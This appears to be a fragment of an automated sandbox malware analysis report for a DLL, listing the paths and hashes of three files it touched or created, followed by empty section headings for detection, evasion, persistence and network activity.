C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ICP3AR65KZ21I1DQ2Z5.temp	data	8D11F05715F26EAABA0B5A8F5E0D0D6C	370EFEBC66A9AD4766C1AFA9B2F3EFCA8856E95C	6E81EE6EE07120EF179694A606249A691D2FB50438BB10D56DC5A19015849873
C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}	ASCII text, with CRLF line terminators	EF670621A9E40D4C16F6E8FD8F4A92D6	5D0B314D2BFA423E8831C063C70B3481A65695E5	C46103D30628753D940B8BF4C7B993590EE9484AAC58CF5A549351408C134C6D
C:\Users\user\Documents\20210215\PowerShell_transcript.965543.+w5YM+DY.20210215212700.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	FDC6B05B87F775E5D10E1508743790FC	5E4D95C2C7331CC8732ABAC8FA9BB4B5B056D662	6835727E636A5A63A3B1536D02E585ECB93168DFBFAA7DF54D353E7D5C5CABF1

Analysis Report NJPcHPuRcG.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs